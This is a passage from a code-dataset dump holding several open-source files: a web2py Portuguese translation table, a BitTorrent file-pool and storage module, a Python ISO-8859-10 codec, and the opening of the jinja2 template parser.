\"db.tabela1.campo1==\\'valor\\'\". Expressões como \"db.tabela1.campo1==db.tabela2.campo2\" resultam em um JOIN SQL.',\n'The Core': 'The Core',\n'The output of the file is a dictionary that was rendered by the view %s': 'A saída do arquivo é um dicionário que foi apresentado pela visão %s',\n'The Views': 'As views',\n'This App': 'Esta aplicação',\n'This email already has an account': 'Este email já tem uma conta',\n'This is a copy of the scaffolding application': 'Isto é uma cópia da aplicação modelo',\n'Time in Cache (h:m:s)': 'Tempo em Cache (h:m:s)',\n'Timestamp': 'Timestamp',\n'Twitter': 'Twitter',\n'unable to parse csv file': 'não foi possível analisar arquivo csv',\n'Update:': 'Atualizar:',\n'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Use (...)&(...) para AND, (...)|(...) para OR, e ~(...) para NOT para construir consultas mais complexas.',\n'User ID': 'ID do Usuário',\n'User Voice': 'Opinião dos usuários',\n'Videos': 'Vídeos',\n'View': 'Visualização',\n'Web2py': 'Web2py',\n'Welcome': 'Bem-vindo',\n'Welcome %s': 'Bem-vindo %s',\n'Welcome to web2py': 'Bem-vindo ao web2py',\n'Welcome to web2py!': 'Bem-vindo ao web2py!',\n'Which called the function %s located in the file %s': 'Que chamou a função %s localizada no arquivo %s',\n'You are successfully running web2py': 'Você está executando o web2py com sucesso',\n'You are successfully running web2py.': 'Você está executando o web2py com sucesso.',\n'You can modify this application and adapt it to your needs': 'Você pode modificar esta aplicação e adaptá-la às suas necessidades',\n'You visited the url %s': 'Você acessou a url %s',\n'Working...': 'Trabalhando...',\n}\n"},"license":{"kind":"string","value":"gpl-3.0"}}},{"rowIdx":2431,"cells":{"repo_name":{"kind":"string","value":"rabimba/p2pScrapper"},"path":{"kind":"string","value":"BitTorrent-5.2.2/BitTorrent/Storage_threadpool.py"},"copies":{"kind":"string","value":"6"},"size":{"kind":"string","value":"14110"},"content":{"kind":"string","value":"# The contents of this file are subject to the BitTorrent Open Source License\n# Version 1.1 (the License). You may not copy or use this file, in either\n# source code or executable form, except in compliance with the License. You\n# may obtain a copy of the License at http://www.bittorrent.com/license/.\n#\n# Software distributed under the License is distributed on an AS IS basis,\n# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License\n# for the specific language governing rights and limitations under the\n# License.\n\n# Written by Bram Cohen and Greg Hazel\n\nimport os\nimport sys\nimport Queue\nfrom bisect import bisect_right\nfrom BTL.translation import _\n\nfrom BTL.obsoletepythonsupport import set\n\nfrom BitTorrent import BTFailure\nfrom BTL.defer import Deferred, ThreadedDeferred, Failure, wrap_task\nfrom BTL.yielddefer import launch_coroutine\nfrom BitTorrent.platform import get_allocated_regions\nfrom BTL.sparse_set import SparseSet\nfrom BTL.DictWithLists import DictWithLists, DictWithSets\nimport BTL.stackthreading as threading\nfrom BitTorrent.Storage_base import open_sparse_file, make_file_sparse\nfrom BitTorrent.Storage_base import bad_libc_workaround, is_open_for_write\nfrom BitTorrent.Storage_base import UnregisteredFileException\n\n\nclass FilePool(object):\n\n def __init__(self, doneflag, add_task, external_add_task,\n max_files_open, num_disk_threads):\n self.doneflag = doneflag\n self.external_add_task = external_add_task\n self.file_to_torrent = {}\n\n self.free_handle_condition = threading.Condition()\n self.active_file_to_handles = DictWithSets()\n self.open_file_to_handles = DictWithLists()\n\n self.set_max_files_open(max_files_open)\n\n self.diskq = Queue.Queue()\n for i in xrange(num_disk_threads):\n t = threading.Thread(target=self._disk_thread,\n name=\"disk_thread-%s\" % (i+1))\n t.start()\n\n self.doneflag.addCallback(self.finalize)\n\n def finalize(self, r=None):\n # re-queue self so all threads die. we end up with one extra event on\n # the queue, but who cares.\n self._create_op(self.finalize)\n\n def close_all(self):\n failures = {}\n self.free_handle_condition.acquire()\n while self.get_open_file_count() > 0:\n while len(self.open_file_to_handles) > 0:\n filename, handle = self.open_file_to_handles.popitem()\n try:\n handle.close()\n except Exception, e:\n failures[self.file_to_torrent[filename]] = e\n self.free_handle_condition.notify()\n if self.get_open_file_count() > 0:\n self.free_handle_condition.wait(1)\n self.free_handle_condition.release()\n\n for torrent, e in failures.iteritems():\n torrent.got_exception(e)\n\n def close_files(self, file_set):\n failures = set()\n self.free_handle_condition.acquire()\n done = False\n\n while not done:\n\n filenames = list(self.open_file_to_handles.iterkeys())\n for filename in filenames:\n if filename not in file_set:\n continue\n handles = self.open_file_to_handles.poprow(filename)\n for handle in handles:\n try:\n handle.close()\n except Exception, e:\n failures.add(e)\n self.free_handle_condition.notify()\n\n done = True\n for filename in file_set.iterkeys():\n if filename in self.active_file_to_handles:\n done = False\n break\n\n if not done:\n self.free_handle_condition.wait(0.5)\n self.free_handle_condition.release()\n if len(failures) > 0:\n raise failures.pop()\n\n def set_max_files_open(self, max_files_open):\n if max_files_open <= 0:\n max_files_open = 1e100\n self.max_files_open = max_files_open\n self.close_all()\n\n def add_files(self, files, torrent):\n for filename in files:\n if filename in self.file_to_torrent:\n raise BTFailure(_(\"File %s belongs to another running torrent\")\n % filename)\n for filename in files:\n self.file_to_torrent[filename] = torrent\n\n def remove_files(self, files):\n for filename in files:\n del self.file_to_torrent[filename]\n\n def _ensure_exists(self, filename, length=0):\n if not os.path.exists(filename):\n f = os.path.split(filename)[0]\n if f != '' and not os.path.exists(f):\n os.makedirs(f)\n f = file(filename, 'wb')\n make_file_sparse(filename, f, length)\n f.close()\n\n def get_open_file_count(self):\n t = self.open_file_to_handles.total_length()\n t += self.active_file_to_handles.total_length()\n return t\n\n def acquire_handle(self, filename, for_write, length=0):\n # this will block until a new file handle can be made\n self.free_handle_condition.acquire()\n\n if filename not in self.file_to_torrent:\n self.free_handle_condition.release()\n raise UnregisteredFileException()\n\n while self.active_file_to_handles.total_length() == self.max_files_open:\n self.free_handle_condition.wait()\n\n if filename in self.open_file_to_handles:\n handle = self.open_file_to_handles.pop_from_row(filename)\n if for_write and not is_open_for_write(handle.mode):\n handle.close()\n handle = open_sparse_file(filename, 'rb+', length=length)\n #elif not for_write and is_open_for_write(handle.mode):\n # handle.close()\n # handle = open_sparse_file(filename, 'rb', length=length)\n else:\n if self.get_open_file_count() == self.max_files_open:\n oldfname, oldhandle = self.open_file_to_handles.popitem()\n oldhandle.close()\n self._ensure_exists(filename, length)\n if for_write:\n handle = open_sparse_file(filename, 'rb+', length=length)\n else:\n handle = open_sparse_file(filename, 'rb', length=length)\n\n self.active_file_to_handles.push_to_row(filename, handle)\n self.free_handle_condition.release()\n return handle\n\n def release_handle(self, filename, handle):\n self.free_handle_condition.acquire()\n self.active_file_to_handles.remove_fom_row(filename, handle)\n self.open_file_to_handles.push_to_row(filename, handle)\n self.free_handle_condition.notify()\n self.free_handle_condition.release()\n\n def _create_op(self, _f, *args, **kwargs):\n df = Deferred()\n self.diskq.put((df, _f, args, kwargs))\n return df\n read = _create_op\n write = _create_op\n\n def _disk_thread(self):\n while not self.doneflag.isSet():\n df, func, args, kwargs = self.diskq.get(True)\n try:\n v = func(*args, **kwargs)\n except:\n self.external_add_task(0, df.errback, Failure())\n else:\n self.external_add_task(0, df.callback, v)\n\n\nclass Storage(object):\n\n def __init__(self, config, filepool, save_path,\n files, add_task,\n external_add_task, doneflag):\n self.filepool = filepool\n self.config = config\n self.doneflag = doneflag\n self.add_task = add_task\n self.external_add_task = external_add_task\n self.initialize(save_path, files)\n\n def initialize(self, save_path, files):\n # a list of bytes ranges and filenames for window-based IO\n self.ranges = []\n # a dict of filename-to-ranges for piece priorities and filename lookup\n self.range_by_name = {}\n # a sparse set for smart allocation detection\n self.allocated_regions = SparseSet()\n\n # dict of filename-to-length on disk (for % complete in the file view)\n self.undownloaded = {}\n self.save_path = save_path\n\n # Rather implement this as an ugly hack here than change all the\n # individual calls. Affects all torrent instances using this module.\n if self.config['bad_libc_workaround']:\n bad_libc_workaround()\n\n self.initialized = False\n self.startup_df = ThreadedDeferred(wrap_task(self.external_add_task),\n self._build_file_structs,\n self.filepool, files)\n return self.startup_df\n\n def _build_file_structs(self, filepool, files):\n total = 0\n for filename, length in files:\n # we're shutting down, abort.\n if self.doneflag.isSet():\n return False\n\n self.undownloaded[filename] = length\n if length > 0:\n self.ranges.append((total, total + length, filename))\n\n self.range_by_name[filename] = (total, total + length)\n\n if os.path.exists(filename):\n if not os.path.isfile(filename):\n raise BTFailure(_(\"File %s already exists, but is not a \"\n \"regular file\") % filename)\n l = os.path.getsize(filename)\n if l > length:\n # This is the truncation Bram was talking about that no one\n # else thinks is a good idea.\n #h = file(filename, 'rb+')\n #make_file_sparse(filename, h, length)\n #h.truncate(length)\n #h.close()\n l = length\n\n a = get_allocated_regions(filename, begin=0, length=l)\n if a is not None:\n a.offset(total)\n else:\n a = SparseSet()\n if l > 0:\n a.add(total, total + l)\n self.allocated_regions += a\n total += length\n self.total_length = total\n self.initialized = True\n return True\n\n def get_byte_range_for_filename(self, filename):\n if filename not in self.range_by_name:\n filename = os.path.normpath(filename)\n filename = os.path.join(self.save_path, filename)\n return self.range_by_name[filename]\n\n def was_preallocated(self, pos, length):\n return self.allocated_regions.is_range_in(pos, pos+length)\n\n def get_total_length(self):\n return self.total_length\n\n def _intervals(self, pos, amount):\n r = []\n stop = pos + amount\n p = max(bisect_right(self.ranges, (pos, 2 ** 500)) - 1, 0)\n for begin, end, filename in self.ranges[p:]:\n if begin >= stop:\n break\n r.append((filename, max(pos, begin) - begin, min(end, stop) - begin))\n return r\n\n def _read(self, filename, pos, amount):\n begin, end = self.get_byte_range_for_filename(filename)\n length = end - begin\n h = self.filepool.acquire_handle(filename, for_write=False, length=length)\n if h is None:\n return\n try:\n h.seek(pos)\n r = h.read(amount)\n finally:\n self.filepool.release_handle(filename, h)\n return r\n\n def _batch_read(self, pos, amount):\n dfs = []\n r = []\n\n # queue all the reads\n for filename, pos, end in self._intervals(pos, amount):\n df = self.filepool.read(self._read, filename, pos, end - pos)\n dfs.append(df)\n\n # yield on all the reads in order - they complete in any order\n exc = None\n for df in dfs:\n yield df\n try:\n r.append(df.getResult())\n except:\n exc = exc or sys.exc_info()\n if exc:\n raise exc[0], exc[1], exc[2]\n\n r = ''.join(r)\n\n if len(r) != amount:\n raise BTFailure(_(\"Short read (%d of %d) - something truncated files?\") %\n (len(r), amount))\n\n yield r\n\n def read(self, pos, amount):\n df = launch_coroutine(wrap_task(self.add_task),\n self._batch_read, pos, amount)\n return df\n\n def _write(self, filename, pos, s):\n begin, end = self.get_byte_range_for_filename(filename)\n length = end - begin\n h = self.filepool.acquire_handle(filename, for_write=True, length=length)\n if h is None:\n return\n try:\n h.seek(pos)\n h.write(s)\n finally:\n self.filepool.release_handle(filename, h)\n return len(s)\n\n def _batch_write(self, pos, s):\n dfs = []\n\n total = 0\n amount = len(s)\n\n # queue all the writes\n for filename, begin, end in self._intervals(pos, amount):\n length = end - begin\n d = buffer(s, total, length)\n total += length\n df = self.filepool.write(self._write, filename, begin, d)\n dfs.append(df)\n\n # yield on all the writes - they complete in any order\n exc = None\n for df in dfs:\n yield df\n try:\n df.getResult()\n except:\n exc = exc or sys.exc_info()\n if exc:\n raise exc[0], exc[1], exc[2]\n\n yield total\n\n def write(self, pos, s):\n df = launch_coroutine(wrap_task(self.add_task),\n self._batch_write, pos, s)\n return df\n\n def close(self):\n if not self.initialized:\n self.startup_df.addCallback(lambda *a : self.filepool.close_files(self.range_by_name))\n return self.startup_df\n self.filepool.close_files(self.range_by_name)\n\n def downloaded(self, pos, length):\n for filename, begin, end in self._intervals(pos, length):\n self.undownloaded[filename] -= end - begin\n"},"license":{"kind":"string","value":"mit"}}},{"rowIdx":2432,"cells":{"repo_name":{"kind":"string","value":"jcoady9/python-for-android"},"path":{"kind":"string","value":"python3-alpha/python3-src/Lib/encodings/iso8859_10.py"},"copies":{"kind":"string","value":"272"},"size":{"kind":"string","value":"13589"},"content":{"kind":"string","value":"\"\"\" Python Character Mapping Codec iso8859_10 generated from 'MAPPINGS/ISO8859/8859-10.TXT' with gencodec.py.\n\n\"\"\"#\"\n\nimport codecs\n\n### Codec APIs\n\nclass Codec(codecs.Codec):\n\n def encode(self,input,errors='strict'):\n return codecs.charmap_encode(input,errors,encoding_table)\n\n def decode(self,input,errors='strict'):\n return codecs.charmap_decode(input,errors,decoding_table)\n\nclass IncrementalEncoder(codecs.IncrementalEncoder):\n def encode(self, input, final=False):\n return codecs.charmap_encode(input,self.errors,encoding_table)[0]\n\nclass IncrementalDecoder(codecs.IncrementalDecoder):\n def decode(self, input, final=False):\n return codecs.charmap_decode(input,self.errors,decoding_table)[0]\n\nclass StreamWriter(Codec,codecs.StreamWriter):\n pass\n\nclass StreamReader(Codec,codecs.StreamReader):\n pass\n\n### encodings module API\n\ndef getregentry():\n return codecs.CodecInfo(\n name='iso8859-10',\n encode=Codec().encode,\n decode=Codec().decode,\n incrementalencoder=IncrementalEncoder,\n incrementaldecoder=IncrementalDecoder,\n streamreader=StreamReader,\n streamwriter=StreamWriter,\n )\n\n\n### Decoding Table\n\ndecoding_table = (\n '\\x00' # 0x00 -> NULL\n '\\x01' # 0x01 -> START OF HEADING\n '\\x02' # 0x02 -> START OF TEXT\n '\\x03' # 0x03 -> END OF TEXT\n '\\x04' # 0x04 -> END OF TRANSMISSION\n '\\x05' # 0x05 -> ENQUIRY\n '\\x06' # 0x06 -> ACKNOWLEDGE\n '\\x07' # 0x07 -> BELL\n '\\x08' # 0x08 -> BACKSPACE\n '\\t' # 0x09 -> HORIZONTAL TABULATION\n '\\n' # 0x0A -> LINE FEED\n '\\x0b' # 0x0B -> VERTICAL TABULATION\n '\\x0c' # 0x0C -> FORM FEED\n '\\r' # 0x0D -> CARRIAGE RETURN\n '\\x0e' # 0x0E -> SHIFT OUT\n '\\x0f' # 0x0F -> SHIFT IN\n '\\x10' # 0x10 -> DATA LINK ESCAPE\n '\\x11' # 0x11 -> DEVICE CONTROL ONE\n '\\x12' # 0x12 -> DEVICE CONTROL TWO\n '\\x13' # 0x13 -> DEVICE CONTROL THREE\n '\\x14' # 0x14 -> DEVICE CONTROL FOUR\n '\\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE\n '\\x16' # 0x16 -> SYNCHRONOUS IDLE\n '\\x17' # 0x17 -> END OF TRANSMISSION BLOCK\n '\\x18' # 0x18 -> CANCEL\n '\\x19' # 0x19 -> END OF MEDIUM\n '\\x1a' # 0x1A -> SUBSTITUTE\n '\\x1b' # 0x1B -> ESCAPE\n '\\x1c' # 0x1C -> FILE SEPARATOR\n '\\x1d' # 0x1D -> GROUP SEPARATOR\n '\\x1e' # 0x1E -> RECORD SEPARATOR\n '\\x1f' # 0x1F -> UNIT SEPARATOR\n ' ' # 0x20 -> SPACE\n '!' # 0x21 -> EXCLAMATION MARK\n '\"' # 0x22 -> QUOTATION MARK\n '#' # 0x23 -> NUMBER SIGN\n '$' # 0x24 -> DOLLAR SIGN\n '%' # 0x25 -> PERCENT SIGN\n '&' # 0x26 -> AMPERSAND\n \"'\" # 0x27 -> APOSTROPHE\n '(' # 0x28 -> LEFT PARENTHESIS\n ')' # 0x29 -> RIGHT PARENTHESIS\n '*' # 0x2A -> ASTERISK\n '+' # 0x2B -> PLUS SIGN\n ',' # 0x2C -> COMMA\n '-' # 0x2D -> HYPHEN-MINUS\n '.' # 0x2E -> FULL STOP\n '/' # 0x2F -> SOLIDUS\n '0' # 0x30 -> DIGIT ZERO\n '1' # 0x31 -> DIGIT ONE\n '2' # 0x32 -> DIGIT TWO\n '3' # 0x33 -> DIGIT THREE\n '4' # 0x34 -> DIGIT FOUR\n '5' # 0x35 -> DIGIT FIVE\n '6' # 0x36 -> DIGIT SIX\n '7' # 0x37 -> DIGIT SEVEN\n '8' # 0x38 -> DIGIT EIGHT\n '9' # 0x39 -> DIGIT NINE\n ':' # 0x3A -> COLON\n ';' # 0x3B -> SEMICOLON\n '<' # 0x3C -> LESS-THAN SIGN\n '=' # 0x3D -> EQUALS SIGN\n '>' # 0x3E -> GREATER-THAN SIGN\n '?' # 0x3F -> QUESTION MARK\n '@' # 0x40 -> COMMERCIAL AT\n 'A' # 0x41 -> LATIN CAPITAL LETTER A\n 'B' # 0x42 -> LATIN CAPITAL LETTER B\n 'C' # 0x43 -> LATIN CAPITAL LETTER C\n 'D' # 0x44 -> LATIN CAPITAL LETTER D\n 'E' # 0x45 -> LATIN CAPITAL LETTER E\n 'F' # 0x46 -> LATIN CAPITAL LETTER F\n 'G' # 0x47 -> LATIN CAPITAL LETTER G\n 'H' # 0x48 -> LATIN CAPITAL LETTER H\n 'I' # 0x49 -> LATIN CAPITAL LETTER I\n 'J' # 0x4A -> LATIN CAPITAL LETTER J\n 'K' # 0x4B -> LATIN CAPITAL LETTER K\n 'L' # 0x4C -> LATIN CAPITAL LETTER L\n 'M' # 0x4D -> LATIN CAPITAL LETTER M\n 'N' # 0x4E -> LATIN CAPITAL LETTER N\n 'O' # 0x4F -> LATIN CAPITAL LETTER O\n 'P' # 0x50 -> LATIN CAPITAL LETTER P\n 'Q' # 0x51 -> LATIN CAPITAL LETTER Q\n 'R' # 0x52 -> LATIN CAPITAL LETTER R\n 'S' # 0x53 -> LATIN CAPITAL LETTER S\n 'T' # 0x54 -> LATIN CAPITAL LETTER T\n 'U' # 0x55 -> LATIN CAPITAL LETTER U\n 'V' # 0x56 -> LATIN CAPITAL LETTER V\n 'W' # 0x57 -> LATIN CAPITAL LETTER W\n 'X' # 0x58 -> LATIN CAPITAL LETTER X\n 'Y' # 0x59 -> LATIN CAPITAL LETTER Y\n 'Z' # 0x5A -> LATIN CAPITAL LETTER Z\n '[' # 0x5B -> LEFT SQUARE BRACKET\n '\\\\' # 0x5C -> REVERSE SOLIDUS\n ']' # 0x5D -> RIGHT SQUARE BRACKET\n '^' # 0x5E -> CIRCUMFLEX ACCENT\n '_' # 0x5F -> LOW LINE\n '`' # 0x60 -> GRAVE ACCENT\n 'a' # 0x61 -> LATIN SMALL LETTER A\n 'b' # 0x62 -> LATIN SMALL LETTER B\n 'c' # 0x63 -> LATIN SMALL LETTER C\n 'd' # 0x64 -> LATIN SMALL LETTER D\n 'e' # 0x65 -> LATIN SMALL LETTER E\n 'f' # 0x66 -> LATIN SMALL LETTER F\n 'g' # 0x67 -> LATIN SMALL LETTER G\n 'h' # 0x68 -> LATIN SMALL LETTER H\n 'i' # 0x69 -> LATIN SMALL LETTER I\n 'j' # 0x6A -> LATIN SMALL LETTER J\n 'k' # 0x6B -> LATIN SMALL LETTER K\n 'l' # 0x6C -> LATIN SMALL LETTER L\n 'm' # 0x6D -> LATIN SMALL LETTER M\n 'n' # 0x6E -> LATIN SMALL LETTER N\n 'o' # 0x6F -> LATIN SMALL LETTER O\n 'p' # 0x70 -> LATIN SMALL LETTER P\n 'q' # 0x71 -> LATIN SMALL LETTER Q\n 'r' # 0x72 -> LATIN SMALL LETTER R\n 's' # 0x73 -> LATIN SMALL LETTER S\n 't' # 0x74 -> LATIN SMALL LETTER T\n 'u' # 0x75 -> LATIN SMALL LETTER U\n 'v' # 0x76 -> LATIN SMALL LETTER V\n 'w' # 0x77 -> LATIN SMALL LETTER W\n 'x' # 0x78 -> LATIN SMALL LETTER X\n 'y' # 0x79 -> LATIN SMALL LETTER Y\n 'z' # 0x7A -> LATIN SMALL LETTER Z\n '{' # 0x7B -> LEFT CURLY BRACKET\n '|' # 0x7C -> VERTICAL LINE\n '}' # 0x7D -> RIGHT CURLY BRACKET\n '~' # 0x7E -> TILDE\n '\\x7f' # 0x7F -> DELETE\n '\\x80' # 0x80 -> \n '\\x81' # 0x81 -> \n '\\x82' # 0x82 -> \n '\\x83' # 0x83 -> \n '\\x84' # 0x84 -> \n '\\x85' # 0x85 -> \n '\\x86' # 0x86 -> \n '\\x87' # 0x87 -> \n '\\x88' # 0x88 -> \n '\\x89' # 0x89 -> \n '\\x8a' # 0x8A -> \n '\\x8b' # 0x8B -> \n '\\x8c' # 0x8C -> \n '\\x8d' # 0x8D -> \n '\\x8e' # 0x8E -> \n '\\x8f' # 0x8F -> \n '\\x90' # 0x90 -> \n '\\x91' # 0x91 -> \n '\\x92' # 0x92 -> \n '\\x93' # 0x93 -> \n '\\x94' # 0x94 -> \n '\\x95' # 0x95 -> \n '\\x96' # 0x96 -> \n '\\x97' # 0x97 -> \n '\\x98' # 0x98 -> \n '\\x99' # 0x99 -> \n '\\x9a' # 0x9A -> \n '\\x9b' # 0x9B -> \n '\\x9c' # 0x9C -> \n '\\x9d' # 0x9D -> \n '\\x9e' # 0x9E -> \n '\\x9f' # 0x9F -> \n '\\xa0' # 0xA0 -> NO-BREAK SPACE\n '\\u0104' # 0xA1 -> LATIN CAPITAL LETTER A WITH OGONEK\n '\\u0112' # 0xA2 -> LATIN CAPITAL LETTER E WITH MACRON\n '\\u0122' # 0xA3 -> LATIN CAPITAL LETTER G WITH CEDILLA\n '\\u012a' # 0xA4 -> LATIN CAPITAL LETTER I WITH MACRON\n '\\u0128' # 0xA5 -> LATIN CAPITAL LETTER I WITH TILDE\n '\\u0136' # 0xA6 -> LATIN CAPITAL LETTER K WITH CEDILLA\n '\\xa7' # 0xA7 -> SECTION SIGN\n '\\u013b' # 0xA8 -> LATIN CAPITAL LETTER L WITH CEDILLA\n '\\u0110' # 0xA9 -> LATIN CAPITAL LETTER D WITH STROKE\n '\\u0160' # 0xAA -> LATIN CAPITAL LETTER S WITH CARON\n '\\u0166' # 0xAB -> LATIN CAPITAL LETTER T WITH STROKE\n '\\u017d' # 0xAC -> LATIN CAPITAL LETTER Z WITH CARON\n '\\xad' # 0xAD -> SOFT HYPHEN\n '\\u016a' # 0xAE -> LATIN CAPITAL LETTER U WITH MACRON\n '\\u014a' # 0xAF -> LATIN CAPITAL LETTER ENG\n '\\xb0' # 0xB0 -> DEGREE SIGN\n '\\u0105' # 0xB1 -> LATIN SMALL LETTER A WITH OGONEK\n '\\u0113' # 0xB2 -> LATIN SMALL LETTER E WITH MACRON\n '\\u0123' # 0xB3 -> LATIN SMALL LETTER G WITH CEDILLA\n '\\u012b' # 0xB4 -> LATIN SMALL LETTER I WITH MACRON\n '\\u0129' # 0xB5 -> LATIN SMALL LETTER I WITH TILDE\n '\\u0137' # 0xB6 -> LATIN SMALL LETTER K WITH CEDILLA\n '\\xb7' # 0xB7 -> MIDDLE DOT\n '\\u013c' # 0xB8 -> LATIN SMALL LETTER L WITH CEDILLA\n '\\u0111' # 0xB9 -> LATIN SMALL LETTER D WITH STROKE\n '\\u0161' # 0xBA -> LATIN SMALL LETTER S WITH CARON\n '\\u0167' # 0xBB -> LATIN SMALL LETTER T WITH STROKE\n '\\u017e' # 0xBC -> LATIN SMALL LETTER Z WITH CARON\n '\\u2015' # 0xBD -> HORIZONTAL BAR\n '\\u016b' # 0xBE -> LATIN SMALL LETTER U WITH MACRON\n '\\u014b' # 0xBF -> LATIN SMALL LETTER ENG\n '\\u0100' # 0xC0 -> LATIN CAPITAL LETTER A WITH MACRON\n '\\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE\n '\\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX\n '\\xc3' # 0xC3 -> LATIN CAPITAL LETTER A WITH TILDE\n '\\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS\n '\\xc5' # 0xC5 -> LATIN CAPITAL LETTER A WITH RING ABOVE\n '\\xc6' # 0xC6 -> LATIN CAPITAL LETTER AE\n '\\u012e' # 0xC7 -> LATIN CAPITAL LETTER I WITH OGONEK\n '\\u010c' # 0xC8 -> LATIN CAPITAL LETTER C WITH CARON\n '\\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE\n '\\u0118' # 0xCA -> LATIN CAPITAL LETTER E WITH OGONEK\n '\\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS\n '\\u0116' # 0xCC -> LATIN CAPITAL LETTER E WITH DOT ABOVE\n '\\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE\n '\\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX\n '\\xcf' # 0xCF -> LATIN CAPITAL LETTER I WITH DIAERESIS\n '\\xd0' # 0xD0 -> LATIN CAPITAL LETTER ETH (Icelandic)\n '\\u0145' # 0xD1 -> LATIN CAPITAL LETTER N WITH CEDILLA\n '\\u014c' # 0xD2 -> LATIN CAPITAL LETTER O WITH MACRON\n '\\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE\n '\\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX\n '\\xd5' # 0xD5 -> LATIN CAPITAL LETTER O WITH TILDE\n '\\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS\n '\\u0168' # 0xD7 -> LATIN CAPITAL LETTER U WITH TILDE\n '\\xd8' # 0xD8 -> LATIN CAPITAL LETTER O WITH STROKE\n '\\u0172' # 0xD9 -> LATIN CAPITAL LETTER U WITH OGONEK\n '\\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE\n '\\xdb' # 0xDB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX\n '\\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS\n '\\xdd' # 0xDD -> LATIN CAPITAL LETTER Y WITH ACUTE\n '\\xde' # 0xDE -> LATIN CAPITAL LETTER THORN (Icelandic)\n '\\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S (German)\n '\\u0101' # 0xE0 -> LATIN SMALL LETTER A WITH MACRON\n '\\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE\n '\\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX\n '\\xe3' # 0xE3 -> LATIN SMALL LETTER A WITH TILDE\n '\\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS\n '\\xe5' # 0xE5 -> LATIN SMALL LETTER A WITH RING ABOVE\n '\\xe6' # 0xE6 -> LATIN SMALL LETTER AE\n '\\u012f' # 0xE7 -> LATIN SMALL LETTER I WITH OGONEK\n '\\u010d' # 0xE8 -> LATIN SMALL LETTER C WITH CARON\n '\\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE\n '\\u0119' # 0xEA -> LATIN SMALL LETTER E WITH OGONEK\n '\\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS\n '\\u0117' # 0xEC -> LATIN SMALL LETTER E WITH DOT ABOVE\n '\\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE\n '\\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX\n '\\xef' # 0xEF -> LATIN SMALL LETTER I WITH DIAERESIS\n '\\xf0' # 0xF0 -> LATIN SMALL LETTER ETH (Icelandic)\n '\\u0146' # 0xF1 -> LATIN SMALL LETTER N WITH CEDILLA\n '\\u014d' # 0xF2 -> LATIN SMALL LETTER O WITH MACRON\n '\\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE\n '\\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX\n '\\xf5' # 0xF5 -> LATIN SMALL LETTER O WITH TILDE\n '\\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS\n '\\u0169' # 0xF7 -> LATIN SMALL LETTER U WITH TILDE\n '\\xf8' # 0xF8 -> LATIN SMALL LETTER O WITH STROKE\n '\\u0173' # 0xF9 -> LATIN SMALL LETTER U WITH OGONEK\n '\\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE\n '\\xfb' # 0xFB -> LATIN SMALL LETTER U WITH CIRCUMFLEX\n '\\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS\n '\\xfd' # 0xFD -> LATIN SMALL LETTER Y WITH ACUTE\n '\\xfe' # 0xFE -> LATIN SMALL LETTER THORN (Icelandic)\n '\\u0138' # 0xFF -> LATIN SMALL LETTER KRA\n)\n\n### Encoding table\nencoding_table=codecs.charmap_build(decoding_table)\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2433,"cells":{"repo_name":{"kind":"string","value":"xxhank/namebench"},"path":{"kind":"string","value":"nb_third_party/jinja2/parser.py"},"copies":{"kind":"string","value":"215"},"size":{"kind":"string","value":"34717"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\"\"\"\n jinja2.parser\n ~~~~~~~~~~~~~\n\n Implements the template parser.\n\n :copyright: (c) 2010 by the Jinja Team.\n :license: BSD, see LICENSE for more details.\n\"\"\"\nfrom jinja2 import nodes\nfrom jinja2.exceptions import TemplateSyntaxError, TemplateAssertionError\nfrom jinja2.utils import next\nfrom jinja2.lexer import describe_token, describe_token_expr\n\n\n#: statements that callinto \n_statement_keywords = frozenset(['for', 'if', 'block', 'extends', 'print',\n 'macro', 'include', 'from', 'import',\n 'set'])\n_compare_operators = frozenset(['eq', 'ne', 'lt', 'lteq', 'gt', 'gteq'])\n\n\nclass Parser(object):\n \"\"\"This is the central parsing class Jinja2 uses. It's passed to\n extensions and can be used to parse expressions or statements.\n \"\"\"\n\n def __init__(self, environment, source, name=None, filename=None,\n state=None):\n self.environment = environment\n self.stream = environment._tokenize(source, name, filename, state)\n self.name = name\n self.filename = filename\n self.closed = False\n self.extensions = {}\n for extension in environment.iter_extensions():\n for tag in extension.tags:\n self.extensions[tag] = extension.parse\n self._last_identifier = 0\n self._tag_stack = []\n self._end_token_stack = []\n\n def fail(self, msg, lineno=None, exc=TemplateSyntaxError):\n \"\"\"Convenience method that raises `exc` with the message, passed\n line number or last line number as well as the current name and\n filename.\n \"\"\"\n if lineno is None:\n lineno = self.stream.current.lineno\n raise exc(msg, lineno, self.name, self.filename)\n\n def _fail_ut_eof(self, name, end_token_stack, lineno):\n expected 